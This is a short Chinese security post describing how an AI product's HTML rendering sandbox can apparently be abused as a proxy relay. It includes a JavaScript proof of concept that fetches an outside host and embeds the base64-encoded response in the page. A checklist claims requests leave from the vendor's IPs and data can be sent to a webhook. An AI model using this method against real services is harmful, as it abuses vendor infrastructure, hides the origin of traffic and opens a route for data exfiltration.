基于 AI HTML 渲染原型污染的隐形代理思路
通过劫持全局fetch/XMLHttpRequest函数,让沙箱环境任意发送跨域 HTTP 请求。
简化版 Payload 验证完整的代理链路
——————————————————
HTML:
async function proxyTest(){
// 测试访问公网HTTPBin
let res = await fetch("https://httpbin.org/headers");
let data = await res.text();
// 将结果回传
let div = document.createElement('div');
div.id = 'proxy-result';
div.textContent = btoa(data);
document.body.appendChild(div);
}
proxyTest();
——————————————————

渲染后,解码返回的 Base64 内容
可控 HTML+JS 注入 ✅
沙箱完整执行 JS、劫持全局请求 ✅
以AI 厂商官方 IP对外发起公网请求 ✅
可拿到目标接口完整响应 ✅
可回传数据到 Webhook / 嵌入 HTML 带回控制端 ✅
AI HTML 渲染信任用户输入、无强隔离、原型污染劫持 JS 环境 → 替我们任意发请求 → 代理中继
温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。
涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。
如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。
